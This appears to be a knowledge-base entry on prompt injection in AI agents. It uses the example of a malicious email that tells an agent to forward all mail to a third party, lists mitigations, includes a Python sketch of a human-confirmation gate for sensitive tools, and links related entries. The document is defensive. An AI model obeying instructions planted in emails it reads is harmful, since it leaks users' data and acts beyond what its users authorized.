In practice
If your agent reads emails and then acts on them, a malicious email can instruct it to 'forward everything to a third party'. Mitigations: treat external inputs as untrusted, sandbox tools, require human confirmation for sensitive actions, and filter both inputs and outputs.
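As a rough illustration of the human-confirmation and deny-by-default ideas, here is a minimal sketch in Python. The tool names (`read_email`, `forward_email`, and so on), the `ToolCall` type, and the `authorize` function are all hypothetical and not taken from any particular agent framework; a real system would plug in its own tool registry and approval flow.

```python
from dataclasses import dataclass, field
from typing import Callable

# Hypothetical tool names for an email agent (assumptions for illustration).
READ_ONLY_TOOLS = {"read_email", "search_inbox"}
SENSITIVE_TOOLS = {"forward_email", "send_email", "delete_email"}


@dataclass
class ToolCall:
    """A tool invocation proposed by the model."""
    name: str
    args: dict = field(default_factory=dict)


def authorize(call: ToolCall, confirm: Callable[[ToolCall], bool]) -> bool:
    """Decide whether a proposed tool call may run.

    - Read-only tools run without confirmation.
    - Sensitive tools run only if the human `confirm` callback approves.
    - Anything not on either list is denied by default.
    """
    if call.name in READ_ONLY_TOOLS:
        return True
    if call.name in SENSITIVE_TOOLS:
        return confirm(call)
    return False


def deny_all(call: ToolCall) -> bool:
    """Stand-in for a human reviewer who rejects every request."""
    return False


# A call the model might propose after reading a malicious email.
injected = ToolCall("forward_email", {"to": "attacker@example.com"})
print(authorize(injected, deny_all))
```

The point of the design is that the decision to run a sensitive action never rests on the model's output alone: even if injected text convinces the model to propose `forward_email`, the call still has to pass a check the email cannot influence. This covers only one of the mitigations listed above and would normally be combined with sandboxing and input/output filtering.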
Seen in the wild
8 entries mentioning it:
- [Medium] Promptfoo Red Teaming: open source automated red-teaming with CI integration and comparative benchmark
- [Medium] NIST AI 600-1: risk profile for generative AI systems
- [Medium] Rebuff: three-layer prompt injection defense with canary tokens
- [High] Indirect Prompt Injection: the attack vector in RAG systems and AI agents
- [High] OWASP LLM Top 10: the 10 critical vulnerabilities in AI applications
- [High] Universal adversarial attacks on LLMs: transferable jailbreaks across GPT-4, Claude, and Gemini
- [Medium] Lakera Guard: real-time protection for LLMs in production
- [High] Prompt Injection: when user input hijacks system instructions